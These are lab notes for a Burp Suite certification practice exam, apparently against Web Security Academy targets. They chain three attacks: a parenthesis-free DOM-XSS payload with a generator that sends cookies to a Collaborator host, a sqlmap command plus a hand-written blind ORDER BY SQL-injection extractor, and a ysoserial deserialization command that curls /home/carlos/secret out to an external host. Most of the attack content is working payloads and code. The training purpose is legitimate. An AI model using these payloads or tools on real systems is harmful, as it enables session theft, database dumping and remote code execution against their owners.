_______________________________________

BURP SUITE CERTIFIED PRACTITIONER EXAM

Practice Lab 2

Leonardo Tamiano (Hexdump)

_______________________________________

Table of Contents
_________________

1. Step 1 - DOM-XSS to steal user cookie
2. Step 2 - Blind SQLi to get administrator password
3. Step 3 - Insecure Deserialization to leak carlos secret

1 Step 1 - DOM-XSS to steal user cookie
=======================================

The vulnerability is in the same place as in Lab 1, but this time
parentheses are blocked. The payload below works without them: the
`fetch' call is hidden in a base64 string, decoded at runtime with a
tagged template (atob`...` invokes `atob' without parentheses) and
executed the same way through `eval.call'.

,----
| "};x=atob`ZmV0Y2goYGh0dHBzOi8vcXVvcmY0MTB3cXE4M2w2ZHJwMXI4YmZxcmh4OGwxOXEub2FzdGlmeS5jb20vP2M9JHtkb2N1bWVudC5jb29raWV9YCk`;eval.call `${x}`//
`----
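The construction of that payload, as an added example that is not part of the original notes: a builder that produces the same shape for any Collaborator host, a check against a character blocklist, and a decoder that recovers the JavaScript from the atob`...` blob (handy when reviewing a payload captured in a request). The collaborator host passed to the builder is a placeholder, not a real domain; the `LAB_PAYLOAD' constant is the payload from the notes above.

```python
# Added example, not from the original notes: build, check and decode the
# kind of paren-free DOM XSS payload used in Step 1.
import base64
import re

# The payload from the notes above (Collaborator host as it appears there).
LAB_PAYLOAD = ('"};x=atob`ZmV0Y2goYGh0dHBzOi8vcXVvcmY0MTB3cXE4M2w2ZHJwMXI4YmZxcmh4'
               'OGwxOXEub2FzdGlmeS5jb20vP2M9JHtkb2N1bWVudC5jb29raWV9YCk`;eval.call `${x}`//')


def build_payload(collaborator_host: str) -> str:
    """Return an injection string that exfiltrates document.cookie
    without using ( or ).

    The real call is hidden in a base64 blob. At runtime the page decodes it
    with a tagged template, atob`...`, which calls atob without parentheses,
    and runs it with eval.call `${x}`, another tagged-template call.
    collaborator_host is a placeholder: use your own Collaborator domain.
    """
    exfil = "fetch(`https://" + collaborator_host + "/?c=${document.cookie}`)"
    # Strip padding: atob tolerates it being absent, and '=' is one less
    # character to worry about in the injection context.
    b64 = base64.b64encode(exfil.encode()).decode().rstrip("=")
    # `"};` closes the string and object literal the input lands in; the
    # trailing `//` comments out whatever the page appends after it.
    return '"};x=atob`' + b64 + '`;eval.call `${x}`//'


def blocked_chars(payload: str, blocklist: str = "()") -> set[str]:
    """Characters from `blocklist` that occur in `payload` (empty set = passes)."""
    return {c for c in payload if c in blocklist}


def decode_payload(payload: str) -> str:
    """Recover the JavaScript hidden inside the atob`...` blob."""
    m = re.search(r"atob`([A-Za-z0-9+/]+)`", payload)
    if not m:
        raise ValueError("no atob`...` blob found")
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # atob accepts missing padding; Python does not
    return base64.b64decode(b64).decode()
```

Any function call can be written as a tagged template, but only with a single string argument (the tag receives the strings array, which `atob' and `eval' coerce back to a string), which is why the call that needs a real argument list is pushed into the base64-encoded code.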

2 Step 2 - Blind SQLi to get administrator password
===================================================

Exploited with `sqlmap', injecting into the `order' parameter of the
filtered search and dumping the `users' table of the `public' schema:

,----
| sqlmap -u "https://0ae1005803ed0abb826347fb00520013.web-security-academy.net/filtered_search?find=&organize=4&order=ASC&BlogArtist=Sophie+Mail" \
|   --cookie="_lab=47%7cMC0CFE7nlltjNiEcP63FqFPLJ1f6%2fjJ7AhUAk8YfNVL6J%2bJ2n93qNQoiTK6EF9xsCkI%2bRDfctaGysT48KuViBJ5XMuR8eI1YnVAafDK9Q1T79YeXddIyqT%2b1Y6kjLDSygHAWsJw4xaBs4Ht%2fAN0mb%2bqdvYVpZ%2fi4%2bYX6I4GHarxCmWHy; session=uZRcQuS98prWppuINr7MUISyME8PmdO7" \
|   -p 'order' -D public -T users --dump --batch --level=5 --risk=3 \
|   --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
`----
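What `sqlmap' automates in that command, as an added example that is not part of the original notes: a boolean-based blind extraction written by hand against a constructed SQLite database. The notes only record that the `order' parameter was injectable; turning a sort parameter into a true/false oracle with a `CASE' expression inside `ORDER BY' is a standard technique assumed here, not something the notes state about the lab, and the tables, the `filtered_search' function and the administrator password are made up for the example.

```python
# Added example, not from the original notes: boolean-based blind SQLi
# through an injectable ORDER BY, the manual version of what sqlmap did.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the lab's public.users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('wiener', 'peter'), ('administrator', 's3cr3t');
        CREATE TABLE products (name TEXT, price REAL);
        INSERT INTO products VALUES ('zebra', 1.0), ('apple', 9.0), ('mango', 5.0);
    """)
    return db


def filtered_search(db: sqlite3.Connection, order: str) -> list[str]:
    """Hypothetical vulnerable endpoint: the sort parameter is concatenated
    straight into ORDER BY, so UNION is useless but the sort order is ours."""
    rows = db.execute("SELECT name FROM products ORDER BY " + order).fetchall()
    return [r[0] for r in rows]


ADMIN_PASSWORD_QUERY = "SELECT password FROM users WHERE username = 'administrator'"


class BlindOrderBy:
    """Boolean oracle built on an injectable ORDER BY: when the condition is
    true the rows sort by name, otherwise by price, and the response shape
    tells us which."""

    def __init__(self, db: sqlite3.Connection):
        self.db = db
        self.requests = 0  # what --level/--risk cost you in real traffic
        # Calibrate against a known-true and a known-false condition.
        self.when_true = self._fetch("1=1")
        if self._fetch("1=2") == self.when_true:
            raise RuntimeError("sort order does not depend on the condition")

    def _fetch(self, condition: str) -> list[str]:
        self.requests += 1
        injected = f"(CASE WHEN ({condition}) THEN name ELSE price END)"
        return filtered_search(self.db, injected)

    def ask(self, condition: str) -> bool:
        return self._fetch(condition) == self.when_true

    def extract(self, scalar_query: str, max_len: int = 64) -> str:
        """Recover the string `scalar_query` returns, one character at a time,
        binary-searching the printable ASCII range (about 7 requests each)."""
        out = ""
        for pos in range(1, max_len + 1):
            if not self.ask(f"length(({scalar_query})) >= {pos}"):
                break  # end of string
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                # SQLite: unicode(); on PostgreSQL use ascii() instead.
                if self.ask(f"unicode(substr(({scalar_query}), {pos}, 1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            out += chr(lo)
        return out


if __name__ == "__main__":
    oracle = BlindOrderBy(make_db())
    print(oracle.extract(ADMIN_PASSWORD_QUERY), "in", oracle.requests, "requests")
```

The calibration step is the part worth keeping: before trusting an oracle, confirm that a known-true and a known-false condition actually produce different responses, otherwise every "character" you extract is noise.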

3 Step 3 - Insecure Deserialization to leak carlos secret
=========================================================

Exploited with the `CommonsCollections2' gadget chain from ysoserial.
The command below generates a serialized object that runs `curl' on
the server, posting the contents of `/home/carlos/secret' to the
Collaborator domain; the output is then gzipped and base64-encoded
before delivery. The `--add-opens' flags are needed on recent JDKs
(16 and later), which by default block the reflective access to
internal packages that ysoserial relies on.

,----
| java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
|      --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
|      --add-opens=java.base/java.net=ALL-UNNAMED \
|      --add-opens=java.base/java.util=ALL-UNNAMED \
|      -jar ysoserial-all.jar CommonsCollections2 \
|      'curl --data @/home/carlos/secret https://ppiqa3wzrpl7yk1cmowq3aapmgs7g24r.oastify.com/?' \
|   | gzip | base64 -w0 > out-CommonsCollections2
`----
